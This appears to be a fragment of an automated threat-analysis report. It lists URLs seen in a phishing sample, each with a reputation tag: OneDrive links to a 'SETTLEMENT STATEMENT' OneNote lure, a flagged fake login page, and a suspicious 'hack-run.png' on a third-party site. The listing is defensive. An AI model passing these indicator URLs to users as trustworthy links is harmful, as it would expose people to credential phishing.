          • SlashNext: Fake Login Page type: Phishing & Social usering
          		 high
          https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9 false
            		high
            https://logo.clearbit.com/gmail.com false
              		high
              http://shopget24.com/images/sampledata/hack-run.png false
              • Avira URL Cloud: safe
              		 unknown
              https://clients2.googleusercontent.com/crx/blobs/Acy1k0bLIjHsvnKaKN_oRpVaYYvFs25d7GKYF1WXrT6yizCMksBO0c_ggE0B6tx6HPRHe6q1GOEe3_NcIbSiGG8kXeLMUY0sAKVvC6R89zvKM13s5VqoAMZSmuUgjQL5vlygJuArQghXXE_qTL7NlQ/extension_8520_615_0_5.crx false
                		high
                https://onedrive.live.com/redir?resid=5890075B5D858872%21361&authkey=%21AjRjdqYSIWOk6SY&page=View&wd=target%28SETTLEMENT%20STATEMENT.one%7C%2FProtrack%20Solutions%20Limited%7C3862be63-9354-4152-aaeb-9aa40f5d9f43%2F%29 false
                  		high
                  https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard false
                    		high
                    https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css false
                      		high